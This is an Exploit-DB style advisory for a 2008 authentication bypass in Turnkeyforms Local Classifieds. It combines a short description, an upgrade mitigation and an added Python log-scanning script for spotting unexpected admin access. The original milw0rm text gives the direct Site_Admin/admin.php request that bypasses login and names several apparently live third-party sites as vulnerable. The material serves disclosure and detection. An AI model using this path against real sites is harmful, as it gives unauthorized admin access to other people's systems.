Vendor: Local Classifieds
By: G4N0K
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: Local Classifieds
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Turnkeyforms Local Classifieds Auth Bypass Vulnerability

Turnkeyforms Local Classifieds contains an authentication bypass. An attacker can reach the admin panel without authenticating by requesting the admin.php page directly. All versions of the software are affected.

Mitigation:

Upgrade to the latest version of Turnkeyforms Local Classifieds.
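
Until the upgrade is in place, web server access logs can show whether the admin panel is being served to unexpected clients. The following is an added example, not part of the original advisory or the vendor's code: it flags 2xx responses for anything under Site_Admin/ sent to clients outside an expected admin network. Combined Log Format is assumed, and the admin network range and the sample log lines are constructed.

```python
import ipaddress
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: networks from which admin access is expected (constructed value).
ADMIN_NETS = [ipaddress.ip_network("10.0.5.0/24")]
# Constructed sample log lines (documentation-range addresses).
SAMPLE = [
    '203.0.113.7 - - [12/Nov/2008:10:00:01 +0000] "GET /classifieds/Site_Admin/admin.php HTTP/1.1" 200 5120 "-" "-"',
    '10.0.5.12 - - [12/Nov/2008:10:00:05 +0000] "GET /classifieds/Site_Admin/admin.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.20 - - [12/Nov/2008:10:01:00 +0000] "GET /classifieds/%53ite_admin/./admin.php?x=1 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.20 - - [12/Nov/2008:10:01:09 +0000] "GET /classifieds/Site_Admin/admin.php HTTP/1.1" 302 0 "-" "-"',
    '203.0.113.7 - - [12/Nov/2008:10:02:00 +0000] "GET /classifieds/index.php HTTP/1.1" 200 900 "-" "-"',
]

def is_admin_path(target):
    """True if the request target resolves to something under Site_Admin/."""
    path = unquote(urlsplit(target).path)      # undo %-encoding, drop query
    path = posixpath.normpath(path).lower()    # collapse ./ and ../, fold case
    return "/site_admin/" in path + "/"

def unexpected_admin_hits(lines, admin_nets=ADMIN_NETS):
    """Return (ip, method, target, status) for 2xx admin responses sent to
    clients outside admin_nets. Unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:                     # hostname or junk in the ip field
            continue
        if not is_admin_path(target) or not status.startswith("2"):
            continue
        if any(addr in net for net in admin_nets):
            continue
        hits.append((ip, method, target, int(status)))
    return hits

if __name__ == "__main__":
    for hit in unexpected_admin_hits(SAMPLE):
        print(hit)
```

A hit means the admin page body was returned to a client outside the expected range; a redirect to a login page (3xx) is not flagged.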

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Turnkeyforms Local Classifieds Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ Turnkeyforms Local Classifieds ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.turnkeyforms.com/local-classifieds.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 12.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ DTLZ ]===
	
	[!] here we go...
	[»]	http://localhost/[path]/classifieds/Site_Admin/admin.php

	
	
===[ LIVE ]===

	[»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
	[»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
	[»] http://havasufreeads.com/classifieds/Site_Admin/admin.php

	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-12]